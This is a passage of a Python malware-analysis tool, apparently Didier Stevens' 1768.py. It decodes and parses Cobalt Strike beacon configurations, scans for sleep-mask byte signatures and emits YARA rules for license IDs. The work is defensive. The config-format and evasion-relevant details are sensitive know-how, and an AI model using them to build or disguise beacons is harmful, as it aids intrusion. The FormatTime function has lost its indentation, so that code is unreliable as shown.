    instructions, opcodes = DecodeInstructions(parameter, INSTRUCTION_TYPE_MALLEABLE_C2)
    buildOpcodes = ','.join([item for opcode in opcodes for item in opcode])
    return 'Instructions: ' + ','.join(instructions) + ' [7,Input,' + buildOpcodes + ']'
def AnalyzeEmbeddedPEFileSub(payloadsectiondata, options):
    """Locate and parse a Cobalt Strike config inside payloadsectiondata.

    Tries, in order: brute-forced single-byte XOR keys (when options.xorkeys),
    the known 'i' (0x69) and '.' (0x2e) XOR keys with the config marker, and
    finally a statistical search (dump only, no parsing).
    Returns [resultlines, dJSON] (a 2-tuple on the brute-force success path).
    """
    result = []
    if options.xorkeys:
        # Brute-force all 256 single-byte XOR keys looking for the config marker.
        for xorKey in range(256):
            xorKeyBytes = bytes([xorKey])
            startConfigXored = Xor(START_CONFIG, xorKeyBytes)
            for position in FindAll(payloadsectiondata, startConfigXored):
                result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(payloadsectiondata[position:position+0x10000], xorKeyBytes), result, options)
                if result != [ERROR_SANITY_CHECK]:
                    return result, dJSON
        return [result, {}]
    # Default path: try XOR key 'i', then '.', cutting at the config marker.
    xorKey = b'i'
    config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
    if len(config) == 0:
        xorKey = b'.'
        config, startconfig, endconfig = CutData(Xor(payloadsectiondata, xorKey), '[000100010002]:')
    if len(config) == 0:
        # Marker not found: fall back to a statistical search for the config region.
        xorKey = b'i'
        startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
        if startconfig == None:
            xorKey = b'.'
            startconfig, endconfig = StatisticalSearch(payloadsectiondata, xorKey)
        if startconfig == None:
            result.append(ERROR_NO_CONFIG)
            return [result, {}]
        else:
            # Statistical hit: only hexdump the candidate region, do not parse it.
            result.append('Config found (statistical): xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
            result.append(cDump(Xor(payloadsectiondata[startconfig:endconfig + 1], xorKey)).HexAsciiDump(rle=True))
            return [result, {}]
    # result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF')])))
    # result.append('Config found: 0x%08x 0x%08x %s' % (startconfig, endconfig, ' '.join(['0x%08x' % position for position in FindAll(payloadsectiondata, '\x90\x01\x00\x00')])))
    result.append('Config found: xorkey %s 0x%08x 0x%08x' % (xorKey, startconfig, endconfig))
    data = config
    return AnalyzeEmbeddedPEFileSub2(data, result, options)
def AnalyzeEmbeddedPEFileSub2(data, result, options):
    """Parse a decoded Cobalt Strike config (number/type/length/value records).

    data: decoded config bytes; result: list to append report lines to.
    Returns [result, dJSON] where dJSON maps entry number ->
    {'id', 'type', 'info', 'rawvalue'}. Honors options.csv, options.verbose,
    options.select and options.sanitycheck.
    """
    dJSON = {}
    # Known config entry numbers -> names ('#' marks entries without special handling).
    dConfigIdentifiers = {
        0x0001: 'payload type',
        0x0002: 'port',
        0x0003: 'sleeptime',
        0x0004: 'maxgetsize', #
        0x0005: 'jitter',
        0x0006: 'maxdns',
        0x0007: 'publickey',
        0x0008: 'server,get-uri',
        0x0009: 'useragent',
        0x000a: 'post-uri',
        0x000b: 'Malleable_C2_Instructions', #
        0x000c: 'http_get_header',
        0x000d: 'http_post_header',
        0x000e: 'SpawnTo', #
        0x000f: 'pipename',
        0x0010: 'killdate_year', #
        0x0011: 'killdate_month', #
        0x0012: 'killdate_day', #
        0x0013: 'DNS_Idle', #
        0x0014: 'DNS_Sleep', #
        0x0015: 'SSH_HOST', #
        0x0016: 'SSH_PORT', #
        0x0017: 'SSH_USER-NAME', #
        0x0018: 'SSH_PASSWORD', #
        0x0019: 'SSH_PUBKEY', #
        0x001a: 'get-verb',
        0x001b: 'post-verb',
        0x001c: 'HttpPostChunk', #
        0x001d: 'spawnto_x86',
        0x001e: 'spawnto_x64',
        0x001f: 'CryptoScheme', #
        0x0020: 'proxy',
        0x0021: 'proxy_username',
        0x0022: 'proxy_password',
        0x0023: 'proxy_type',
        0x0024: 'deprecated', #
        0x0025: 'license-id',
        0x0026: 'bStageCleanup', #
        0x0027: 'bCFGCaution', #
        0x0028: 'killdate',
        0x0029: 'textSectionEnd', #
        0x002a: 'ObfuscateSectionsInfo', #
        0x002b: 'process-inject-start-rwx',
        0x002c: 'process-inject-use-rwx',
        0x002d: 'process-inject-min_alloc',
        0x002e: 'process-inject-transform-x86',
        0x002f: 'process-inject-transform-x64',
        0x0030: 'DEPRECATED_PROCINJ_ALLOWED',
        0x0031: 'BIND_HOST',
        0x0032: 'UsesCookies',
        0x0033: 'process-inject-execute',
        0x0034: 'process-inject-allocation-method',
        0x0035: 'process-inject-stub',
        0x0036: 'HostHeader',
        0x0037: 'EXIT_FUNK',
        0x0038: 'SSH_BANNER',
        0x0039: 'SMB_FRAME_HEADER',
        0x003a: 'TCP_FRAME_HEADER',
        0x003b: 'HEADERS_TO_REMOVE',
        0x003c: 'DNS_beacon',
        0x003d: 'DNS_A',
        0x003e: 'DNS_AAAA',
        0x003f: 'DNS_TXT',
        0x0040: 'DNS_metadata',
        0x0041: 'DNS_output',
        0x0042: 'DNS_resolver',
        0x0043: 'DNS_STRATEGY',
        0x0044: 'DNS_STRATEGY_ROTATE_SECONDS',
        0x0045: 'DNS_STRATEGY_FAIL_X',
        0x0046: 'DNS_STRATEGY_FAIL_SECONDS',
        0x0047: 'MAX_RETRY_STRATEGY_ATTEMPTS',
        0x0048: 'MAX_RETRY_STRATEGY_INCREASE',
        0x0049: 'MAX_RETRY_STRATEGY_DURATION',
    }
    # Per-entry interpreters that turn raw values into human-readable text.
    dConfigValueInterpreter = {
        0x0001: lambda value: LookupConfigValue(0x0001, value),
        0x0007: ToHexadecimal,
        0x000b: DecodeMalleableC2Instructions,
        0x0013: ConvertIntToIPv4,
        0x0023: lambda value: LookupConfigValue(0x0023, value),
        0x002b: lambda value: LookupConfigValue(0x002b, value),
        0x002c: lambda value: LookupConfigValue(0x002b, value),
    }
    dJSONData = GetJSONData()
    dLookupValues = dJSONData.get('dLookupValues', {})
    # Each record: >H number, >H type, >H length, then `length` value bytes.
    while len(data) >= 2:
        formatNumber = '>H'
        formatTypeLength = '>HH'
        # Keep the raw number/type/length bytes for the --select hexdump below.
        ntlBytes = data[0:struct.calcsize(formatNumber) + struct.calcsize(formatTypeLength)]
        try:
            number, data = Unpack(formatNumber, data)
        except UnpackErrorNotEnoughData:
            break
        if number == 0:
            # Number 0 terminates the config.
            result.append('0x%04x' % number)
            break
        try:
            type, length, data = Unpack(formatTypeLength, data)
        except UnpackErrorNotEnoughData:
            break
        parameter, data = GetChunk(length, data)
        info = ''
        rawvalue = None
        if type == 1 and length == 2:
            # Type 1: 16-bit integer.
            identifier = struct.unpack('>H', parameter)[0]
            rawvalue = identifier
            info = InterpretValue('%d' % identifier, number, identifier, dConfigValueInterpreter)
        elif type == 2 and length == 4:
            # Type 2: 32-bit integer; the DNS strategy entries are signed.
            if number in [0x44, 0x45, 0x46]:
                rawvalue = struct.unpack('>i', parameter)[0]
            else:
                rawvalue = struct.unpack('>I', parameter)[0]
            value = '%d' % rawvalue
            info = InterpretValue(value, number, parameter[0:4], dConfigValueInterpreter)
            info += LookupValue(str(number), value, dLookupValues, options.verbose)
        elif type == 3 and not number in [0x0b, 0x0c, 0x0d]:
            # Type 3: binary data (transform programs 0x0b/0x0c/0x0d are handled below).
            info = InterpretValue('', number, parameter, dConfigValueInterpreter)
            rawvalue = binascii.b2a_hex(parameter).decode()
            if info == '':
                info = Represent(C2SIP3(parameter))
            info += LookupValue(str(number), rawvalue, dLookupValues, options.verbose)
        resultNumber = '0x%04x' % number
        resultType = '0x%04x' % type
        resultLength = '0x%04x' % length
        resultID = dConfigIdentifiers.get(number, '')
        dJSON[number] = {'id': resultID, 'type': resultType, 'info': info, 'rawvalue': rawvalue}
        if options.csv:
            result.append(MakeCSVLine((resultNumber, resultID, resultType, resultLength, info)))
        else:
            # Pad the identifier column to the longest known identifier name.
            resultID = ('%-' + str(max([len(value) for value in dConfigIdentifiers.values()])) + 's') % resultID
            result.append('%s %s %s %s%s' % (resultNumber, resultID, resultType, resultLength, PrefixIfNeeded(info)))
        if type == 3 and number in [0x0b, 0x0c, 0x0d]:
            # Decode and pretty-print the transform program for this entry.
            instructions, opcodes = DecodeInstructions(parameter, {0x0b: INSTRUCTION_TYPE_MALLEABLE_C2, 0x0c: INSTRUCTION_TYPE_GET, 0x0d: INSTRUCTION_TYPE_POST}[number])
            for index, instruction in enumerate(instructions):
                if isinstance(instruction, str):
                    # Plain (ungrouped) instruction.
                    if options.csv:
                        result.append(MakeCSVLine(('', '', '', '', instruction)))
                    else:
                        result.append(' %s' % instruction)
                else:
                    # Grouped Build block: record its opcodes in dJSON too.
                    buildOpcodes = ','.join([':'.join(opcode) for opcode in opcodes[index]])
                    if number in dJSON:
                        if dJSON[number]['info'] == '':
                            dJSON[number]['info'] = buildOpcodes
                        else:
                            dJSON[number]['info'] += ';' + buildOpcodes
                    else:
                        dJSON[number] = {'id': resultID, 'type': resultType, 'info': buildOpcodes, 'rawvalue': binascii.b2a_hex(parameter).decode()}
                    if options.csv:
                        result.append(MakeCSVLine(('', '', '', '', '%s:[%s]' % (instruction[0], buildOpcodes))))
                    else:
                        result.append(' %s: [%s]' % (instruction[0], buildOpcodes))
                    for buildStep in instruction[1:]:
                        if options.csv:
                            result.append(MakeCSVLine(('', '', '', '', buildStep)))
                        else:
                            result.append('  %s' % buildStep)
        # for string in ExtractStringsASCII(parameter):
        #     if options.csv:
        #         result.append(MakeCSVLine(('', '', '', '', string.decode('utf8', 'surrogateescape')), ',', '"'))
        #     else:
        #         result.append('  %s' % string.decode('utf8', 'surrogateescape'))
        if options.select != '':
            # Dump the selected record raw and under both known XOR keys.
            select = ParseInteger(options.select)
            if number == select:
                result.append(' Decoded: %s' % ToHexadecimal(ntlBytes + parameter))
                result.append(" 'i'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'i')))
                result.append(" '.'-encoded: %s" % ToHexadecimal(Xor(ntlBytes + parameter, b'.')))
    result.append('Guessing Cobalt Strike version: %s (max 0x%04x)' % DetermineCSVersionFromConfig(dJSON))
    sanityCheck = SanityCheckExtractedConfig(dJSON)
    result.append('Sanity check Cobalt Strike config: %s' % ('OK' if sanityCheck else 'NOK'))
    if options.sanitycheck and not sanityCheck:
        return [[ERROR_SANITY_CHECK], {}]
    return [result, dJSON]
def AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options):
    """Analyze payloadsectiondata for a beacon config and emit JSON + report lines."""
    analysisLines, dJSON = AnalyzeEmbeddedPEFileSub(payloadsectiondata, options)
    oOutput.JSON(dJSON)
    for analysisLine in analysisLines:
        oOutput.Line(analysisLine)
def DetectPEFile(data):
    """Return True when data starts with a plausible MZ header pointing at a PE header."""
    if len(data) < 40:
        return False
    if not data.startswith(b'MZ'):
        return False
    # e_lfanew: dword at offset 0x3C points to the PE header.
    peOffsetBytes = data[0x3C:0x3C + 4]
    if len(peOffsetBytes) != 4:
        return False
    peOffset = struct.unpack('<I', peOffsetBytes)[0]
    return data[peOffset:peOffset + 2] == b'PE'
def StripLeadingNOPs(data):
    """Remove any run of leading NOP bytes (0x90) from data."""
    return data.lstrip(b'\x90')
def XORChainSlow(iKey, encodedData):
    """Reference implementation of XOR-chain decoding.

    Each little-endian 32-bit word is XORed with the previous *encoded* word,
    seeded with iKey. Trailing bytes (len % 4) are ignored.
    Fix: replaced quadratic bytes concatenation and repeated slicing with an
    index loop and a final join.
    """
    decodedWords = []
    xorkey = iKey
    for index in range(0, len(encodedData) - len(encodedData) % 4, 4):
        encoded = struct.unpack_from('<I', encodedData, index)[0]
        decodedWords.append(struct.pack('<I', encoded ^ xorkey))
        xorkey = encoded
    return b''.join(decodedWords)
def XORChainFast(iKey, encodedData):
    """Fast XOR-chain decode: XOR each little-endian 32-bit word with the
    previous encoded word (seeded with iKey), buffering output in DataIO.
    Trailing bytes (len % 4) are ignored."""
    oDATA = DataIO()
    format = '<I'
    formatLength = struct.calcsize(format)
    xorkey = iKey
    for index in range(0, len(encodedData), formatLength):
        bytesInteger = encodedData[index:index + formatLength]
        if len(bytesInteger) != formatLength:
            break
        encoded = struct.unpack(format, bytesInteger)[0]
        oDATA.write(struct.pack(format, encoded ^ xorkey))
        xorkey = encoded
    return oDATA.getvalue()
def XORChain(iKey, encodedData):
    """XOR-chain decode encodedData seeded with iKey.

    Fix: removed the unreachable verification code that compared against
    XORChainSlow — it sat after an unconditional return and never executed.
    """
    return XORChainFast(iKey, encodedData)
def TryXORChainDecoding(data):
    """Try to locate and decode an XOR-chain encoded payload (CS stager format).

    Scans offsets 1..0xFFF for a (key, key^length) dword pair, trial-decodes
    16 bytes, and on an MZ/MZRE/MZAR hit decodes the full payload and validates
    it (PE header or config marker).
    Returns (decodeddata, [messages]) on success, (data, []) otherwise.
    """
    if len(data) < 0x100:
        return data, []
    formatstring = '<II'
    formatLength = struct.calcsize(formatstring)
    startLength = 16
    for iIter in range(1, 0x1000):
        bytesValues = data[iIter:iIter + formatLength + startLength]
        if len(bytesValues) != formatLength + startLength:
            return data, []
        xorKey, xorEncodedLength = struct.unpack(formatstring, bytesValues[:formatLength])
        # The stored payload length is XORed with the key.
        decodedLength = xorKey ^ xorEncodedLength
        # Trial-decode only the first 16 bytes at this offset.
        decodedStart = XORChain(xorKey, bytesValues[formatLength:])
        if StripLeadingNOPs(decodedStart)[0:2] == b'MZ':
            decodedData = StripLeadingNOPs(XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength]))
            if DetectPEFile(decodedData):
                return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
        # MZRE/MZAR: beacon shellcode stubs; accept when a config marker is present.
        if b'MZRE' in decodedStart or b'MZAR' in decodedStart:
            decodedData = XORChain(xorKey, data[iIter + formatLength:iIter + formatLength + decodedLength])
            if START_CONFIG_I in decodedData or START_CONFIG_DOT in decodedData:
                return decodedData, ['xorkey(chain): 0x%08x' % xorKey, 'length: 0x%08x' % decodedLength]
    return data, []
def TryExtractDecode(data):
    """Apply known extraction/decoding steps until data looks like a PE file
    or contains an encoded config; returns (data, list of info messages)."""
    if DetectPEFile(data):
        return data, []
    stripped = StripLeadingNOPs(data)
    if DetectPEFile(stripped):
        return stripped, ['leading NOPs: 0x%04x' % (len(data) - len(stripped))]
    decoded, messages = TryXORChainDecoding(data)
    if DetectPEFile(decoded):
        return decoded, messages
    if START_CONFIG_I in decoded or START_CONFIG_DOT in decoded:
        return decoded, messages
    return data, []
def TestShellcodeHeuristic(data):
    """Heuristic for CS shellcode: pushed 'wini'/'ws2_' module strings near the
    start, or a leading CLD instruction (0xFC) in a small blob."""
    head = data[:0x1000]
    if b'hwini' in head or b'hws2_' in head:
        return True
    return data.startswith(b'\xFC') and len(data) < 0x1000
def FinalTests(data, options, oOutput):
    """Scan data for known Cobalt Strike byte signatures (sleep-mask routines,
    public key config entry), optionally under XOR keys, and report positions."""
    dSignatures = {
        # https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
        'Sleep mask 64-bit 4.2 deobfuscation routine': b'\x4C\x8B\x53\x08\x45\x8B\x0A\x45\x8B\x5A\x04\x4D\x8D\x52\x08\x45\x85\xC9\x75\x05\x45\x85\xDB\x74\x33\x45\x3B\xCB\x73\xE6\x49\x8B\xF9\x4C\x8B\x03',
        'Sleep mask 32-bit 4.2 deobfuscation routine': b'\x8B\x46\x04\x8B\x08\x8B\x50\x04\x83\xC0\x08\x89\x55\x08\x89\x45\x0C\x85\xC9\x75\x04\x85\xD2\x74\x23\x3B\xCA\x73\xE6\x8B\x06\x8D\x3C\x08\x33\xD2',
        'Public key config entry': b'\x00\x07\x00\x03\x01\x00\x30\x81\x9F\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x81\x8D\x00\x30\x81\x89\x02\x81',
    }
    for name, signature in dSignatures.items():
        xorKeys = [b'\x00']
        # The public key entry may appear XORed with the known 'i'/'.' keys.
        if name == 'Public key config entry':
            xorKeys = [b'\x00', b'\x2e', b'\x69']
        if options.xorkeys:
            xorKeys = [bytes([iter]) for iter in range(256)]
        for xorKey in xorKeys:
            signatureXored = Xor(signature, xorKey)
            for position in FindAll(data, signatureXored):
                # LSFIF: Longest String Found In Front of the signature.
                stringsInFront = sorted(ExtractStringsASCII(data[position-0x100:position]), key=len, reverse=True)
                if len(stringsInFront) > 0:
                    longestString = ' (LSFIF: %s)' % stringsInFront[0]
                else:
                    longestString = ''
                oOutput.Line('%s found: 0x%08x%s%s' % (name, position, IFF(xorKey == b'\x00', '', ' (xorKey %s)' % xorKey), longestString))
                if options.verbose:
                    # Hexdump 0x100 bytes before and after the signature.
                    oOutput.Line(cDump(data[position-0x100:position], ' ', position-0x100).HexAsciiDump(rle=True), eol='')
                    oOutput.Line(' ... signature ...')
                    oOutput.Line(cDump(data[position+len(signatureXored):position+len(signatureXored)+0x100], ' ', position+len(signatureXored)).HexAsciiDump(rle=True), eol='')
# TODO: the retry logic below is a kludge; refactor when time permits
def ProcessBinaryFileSub(sectiondata, data, oOutput, options):
    """Parse a CS loader .data section: a 16-byte header (type, size, xorkey,
    id) followed by the XORed payload; dispatch to config/shellcode analysis.

    Returns False when nothing usable was found, so the caller can retry
    (e.g. after skipping bytes).
    """
    payloadType, payloadSize, intxorkey, id2, sectiondata = Unpack('<IIII', sectiondata)
    oOutput.Line('payloadType: 0x%08x' % payloadType)
    oOutput.Line('payloadSize: 0x%08x' % payloadSize)
    oOutput.Line('intxorkey: 0x%08x' % intxorkey)
    oOutput.Line('id2: 0x%08x' % id2)
    # The payload is XORed with the 32-bit key from the header.
    payload = Xor(sectiondata[:payloadSize], struct.pack('<I', intxorkey))
    if payloadSize > len(sectiondata):
        oOutput.Line('Error: payload size too large: 0x%08x' % payloadSize)
        oOutput.Line('.data section size: 0x%08x' % len(sectiondata))
        return False
    error, payloadsectiondata = GetDataSection(payload)
    if error != None:
        # Decoded payload is not a PE file: try other interpretations.
        positionMZ = payload.find(b'MZ')
        if positionMZ != 0:
            if START_CONFIG_I in sectiondata or START_CONFIG_DOT in sectiondata or options.xorkeys:
                AnalyzeEmbeddedPEFile(data, oOutput, options)
            elif TestShellcodeHeuristic(payload):
                if IdentifyShellcode(payload) == '':
                    oOutput.Line('Probably found shellcode:')
                else:
                    oOutput.Line('Found shellcode:')
                AnalyzeShellcode(payload, oOutput)
                oOutput.Line(cDump(payload).HexAsciiDump(rle=False))
            elif positionMZ >= 0 and positionMZ < 0x20:
                # MZ header slightly offset: analyze from there.
                oOutput.Line('MZ header found position %d' % positionMZ)
                AnalyzeEmbeddedPEFile(payload[positionMZ:], oOutput, options)
            elif len(payload) == 0:
                return False
            else:
                oOutput.Line('MZ header not found, truncated dump:')
                oOutput.Line(cDump(payload[:0x1000]).HexAsciiDump(rle=True))
                return False
        else:
            oOutput.Line('Error: embedded PE file error: %s' % error)
            return False
    else:
        AnalyzeEmbeddedPEFile(payloadsectiondata, oOutput, options)
    FinalTests(payload, options, oOutput)
    return True
def ProcessBinaryFile(filename, content, cutexpression, flag, oOutput, oLogfile, options):
    """Analyze one file (or in-memory `content`): decode/extract, then report
    configs, shellcode or signature findings via oOutput; errors go to oLogfile."""
    if content == None:
        # Read (and optionally extract from archive) the file from disk.
        try:
            oBinaryFile = cBinaryFile(filename, C2BIP3(options.password), options.noextraction, options.literalfilenames)
        except:
            oLogfile.LineError('Opening file %s %s' % (filename, repr(sys.exc_info()[1])))
            return
        oLogfile.Line('Success', 'Opening file %s' % filename)
        try:
            data = oBinaryFile.read()
        except:
            oLogfile.LineError('Reading file %s %s' % (filename, repr(sys.exc_info()[1])))
            return
        data = CutData(data, cutexpression)[0]
        oBinaryFile.close()
        oOutput.Line('File: %s%s' % (filename, IFF(oBinaryFile.extracted, ' (extracted)', '')))
    else:
        data = content
        oOutput.Line('File: %s' % (filename))
    if options.hash:
        oOutput.Line('MD5 : %s' % hashlib.md5(data).hexdigest())
        oOutput.Line('SHA1 : %s' % hashlib.sha1(data).hexdigest())
        oOutput.Line('SHA256: %s' % hashlib.sha256(data).hexdigest())
    try:
        # ----- Put your data processing code here -----
        data, messages = TryExtractDecode(data)
        for message in messages:
            oOutput.Line(message)
        if data[0:2] == b'MZ' and not options.raw:
            # PE file: look for an XOR-chain encoded config section first.
            extracted, messages = GetXorChainSection(data)
            if extracted != None:
                resultChain, dJSON = AnalyzeEmbeddedPEFileSub(extracted, options)
                if resultChain != [ERROR_NO_CONFIG]:
                    oOutput.JSON(dJSON)
                    for message in messages:
                        oOutput.Line(message)
                    for message in resultChain:
                        oOutput.Line(message)
                    FinalTests(extracted, options, oOutput)
                else:
                    extracted = None
            if extracted == None:
                # Fall back to parsing the .data section.
                error, sectiondata = GetDataSection(data)
                if error != None:
                    oOutput.Line('Error: PE file error: %s' % error)
                elif len(sectiondata) < 16:
                    oOutput.Line('Error: section .data too small: %d' % len(sectiondata))
                elif ProcessBinaryFileSub(sectiondata, data, oOutput, options):
                    pass
                else:
                    # Kludge: retry once after skipping 0x20 bytes of the section.
                    bytesToSkip = 0x20
                    oOutput.Line('Skipping %d bytes' % bytesToSkip)
                    ProcessBinaryFileSub(sectiondata[bytesToSkip:], data, oOutput, options)
                FinalTests(data, options, oOutput)
        elif TestShellcodeHeuristic(data):
            if IdentifyShellcode(data) == '':
                oOutput.Line('Probably found shellcode:')
            else:
                oOutput.Line('Found shellcode:')
            AnalyzeShellcode(data, oOutput)
            oOutput.Line(cDump(data).HexAsciiDump(rle=False))
            FinalTests(data, options, oOutput)
        else:
            # Raw scan: search for the XORed config marker with known (or all 256)
            # keys, deduplicating identical configs by the SHA256 of their report.
            dConfigs = {}
            if options.xorkeys:
                xorKeys = range(256)
            else:
                xorKeys = [0x2E, 0x69]
            for xorKey in xorKeys:
                xorKeyBytes = bytes([xorKey])
                startConfigXored = Xor(START_CONFIG, xorKeyBytes)
                for position in FindAll(data, startConfigXored):
                    result, dJSON = AnalyzeEmbeddedPEFileSub2(Xor(data[position:position+0x10000], xorKeyBytes), [], options)
                    configSha256 = hashlib.sha256(''.join(result).encode()).hexdigest()
                    if not configSha256 in dConfigs:
                        dConfigs[configSha256] = True
                        if result != [ERROR_SANITY_CHECK]:
                            oOutput.JSON(dJSON)
                            oOutput.Line('xorkey %s %02x' % (xorKeyBytes, xorKey))
                            for line in result:
                                oOutput.Line(line)
            FinalTests(data, options, oOutput)
        # ----------------------------------------------
    except:
        # Broad except is deliberate: log and continue over bad files, unless
        # --ignoreprocessingerrors is off, in which case re-raise.
        oLogfile.LineError('Processing file %s %s' % (filename, repr(sys.exc_info()[1])))
        if not options.ignoreprocessingerrors:
            raise
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
def SpaceEvery2Characters(string):
    """Insert a space between every pair of characters: 'dead' -> 'de ad'."""
    return ' '.join(string[index:index + 2] for index in range(0, len(string), 2))
def ProcessLicenseIDs(oOutput, oLogfile, options):
    """Generate YARA rules for the license-IDs/watermarks in options.licenseids.

    Each comma-separated item is either an integer or 'name:integer'. Six rules
    are emitted per ID: the config entry (raw, 'i'-XORed, '.'-XORed) and three
    shellcode variants.
    Fix: renamed local variable 'bytes' (shadowed the builtin) to 'idBytes'.
    """
    rule_config = '''rule cs_%s_licenseid {
    meta:
        license_name = "%s"
        license_id = "%d"
        info = "rule generated by 1768.py on %s"
    strings:
        $a = { %s }
    condition:
        $a
}
'''
    rule_config_i = '''rule cs_%s_licenseid_i {
    meta:
        license_name = "%s"
        license_id = "%d"
        info = "rule generated by 1768.py on %s"
    strings:
        $a = { %s }
    condition:
        $a
}
'''
    rule_config_dot = '''rule cs_%s_licenseid_dot {
    meta:
        license_name = "%s"
        license_id = "%d"
        info = "rule generated by 1768.py on %s"
    strings:
        $a = { %s }
    condition:
        $a
}
'''
    rule_shellcode = '''rule cs_%s_licenseid_shellcode {
    meta:
        license_name = "%s"
        license_id = "%d"
        info = "rule generated by 1768.py on %s"
    strings:
        $a = { %s }
    condition:
        $a and filesize < 10000
}
'''
    rule_shellcode_00 = '''rule cs_%s_licenseid_shellcode_00 {
    meta:
        license_name = "%s"
        license_id = "%d"
        info = "rule generated by 1768.py on %s"
    strings:
        $a = { %s }
    condition:
        $a and filesize < 10000
}
'''
    rule_shellcode_00_end = '''rule cs_%s_licenseid_shellcode_00_end {
    meta:
        license_name = "%s"
        license_id = "%d"
        info = "rule generated by 1768.py on %s"
    strings:
        $a = { %s }
    condition:
        $a and filesize < 10000 and $a at (filesize - 5)
}
'''
    for licenseid in options.licenseids.split(','):
        result = licenseid.split(':', 1)
        if len(result) == 1:
            idInteger = ParseInteger(licenseid)
            idBytes = struct.pack('>I', idInteger)
            idName = binascii.b2a_hex(idBytes).decode()
        else:
            idInteger = ParseInteger(result[1])
            idBytes = struct.pack('>I', idInteger)
            idName = result[0]
        # Config entry 0x25 (license-id), type 2, length 4.
        prefix = b'\x00\x25\x00\x02\x00\x04'
        oOutput.Line(rule_config % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(prefix + idBytes).decode())))
        oOutput.Line(rule_config_i % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + idBytes, b'i')).decode())))
        oOutput.Line(rule_config_dot % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(Xor(prefix + idBytes, b'.')).decode())))
        oOutput.Line(rule_shellcode % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(idBytes).decode())))
        oOutput.Line(rule_shellcode_00 % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + idBytes).decode())))
        oOutput.Line(rule_shellcode_00_end % (idName, idName, idInteger, FormatTime(), SpaceEvery2Characters(binascii.b2a_hex(b'\x00' + idBytes).decode())))
class cOutputJSON(object):
    """Output wrapper that collects lines/configs for JSON output (when
    options.jsonoutput is set) or forwards lines to the wrapped oOutput."""

    def __init__(self, oOutput, options):
        self.oOutput = oOutput
        self.options = options
        self.messages = []
        self.filename = ''
        self.JSONs = []

    def JSON(self, dJSON):
        """Record an extracted config dictionary."""
        self.JSONs.append(dJSON)

    def Line(self, line, eol='\n'):
        """Buffer the line for JSON output, or forward it immediately."""
        if not self.options.jsonoutput:
            self.oOutput.Line(line, eol)
            return
        self.messages.append(line)

    def Filename(self, filename, index, total):
        """Forward the filename banner and remember the current filename."""
        self.oOutput.Filename(filename, index, total)
        self.filename = filename
class cAPIOptions(object):
    """Default option set used when 1768 is invoked as a library (APIAnalyze)."""

    def __init__(self):
        # All boolean options default to off.
        for flagName in ('csv', 'ignoreprocessingerrors', 'raw', 'verbose', 'hash', 'sanitycheck', 'xorkeys'):
            setattr(self, flagName, False)
        self.select = ''
class cAPIOutput(object):
    """Collects output lines and extracted configs in memory; discards errors."""

    def __init__(self):
        self.messages = []
        self.JSONs = []

    def JSON(self, dJSON):
        """Record an extracted config dictionary."""
        self.JSONs.append(dJSON)

    def Line(self, line):
        """Record an output line."""
        self.messages.append(line)

    def LineError(self, line):
        """API mode deliberately ignores error lines."""
        return None
def APIAnalyze(data):
    """Library entry point: analyze `data` and return the extracted configs."""
    oCollector = cAPIOutput()
    ProcessBinaryFile('', data, ':', '', oCollector, cAPIOutput(), cAPIOptions())
    return oCollector.JSONs
def ProcessBinaryFiles(filenames, oLogfile, options):
    """Top-level dispatcher: process JSON/stdin input, license-ID YARA rule
    generation, or the list of (filename, cutexpression, flag) tuples."""
    oOutput = cOutputJSON(InstantiateCOutput(options), options)
    index = 0
    if options.jsoninput:
        # Input comes as JSON items on stdin ({'name', 'content'}).
        items = CheckJSON(sys.stdin.read())
        if items == None:
            return
        for item in items:
            oOutput.Filename(item['name'], index, len(items))
            index += 1
            ProcessBinaryFile(item['name'], item['content'], '', '', oOutput, oLogfile, options)
            if options.jsonoutput:
                # NOTE(review): JSONs[0] raises IndexError when no config was
                # extracted for this item — confirm this path is only reached
                # after a successful extraction.
                oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
    elif options.licenseids != '':
        ProcessLicenseIDs(oOutput, oLogfile, options)
    else:
        for filename, cutexpression, flag in filenames:
            oOutput.Filename(filename, index, len(filenames))
            index += 1
            ProcessBinaryFile(filename, None, cutexpression, flag, oOutput, oLogfile, options)
            if options.jsonoutput:
                # NOTE(review): same IndexError risk as above when JSONs is empty.
                oOutput.oOutput.Line(json.dumps({'filename': oOutput.filename, 'messages': oOutput.messages, 'config': oOutput.JSONs[0]}))
def Main():
    """Command-line entry point: parse options, expand filenames, process files."""
    moredesc = '''
Source code put in the public domain by Didier Stevens, no Copyright
Use at your own risk
https://DidierStevens.com'''
    oParser = optparse.OptionParser(usage='usage: %prog [options] [[@]file|cut-expression|flag-expression ...]\n' + __description__ + moredesc, version='%prog ' + __version__, epilog='This tool also accepts flag arguments (#f#), read the man page (-m) for more info.')
    oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')
    oParser.add_option('-r', '--raw', action='store_true', default=False, help='Search through the file as a binary file, do not parse as a PE file')
    oParser.add_option('-s', '--select', default='', help='Field to select')
    oParser.add_option('-S', '--sanitycheck', action='store_true', default=False, help='Exclude configs that do not pass sanity check')
    oParser.add_option('-o', '--output', type=str, default='', help='Output to file (# supported)')
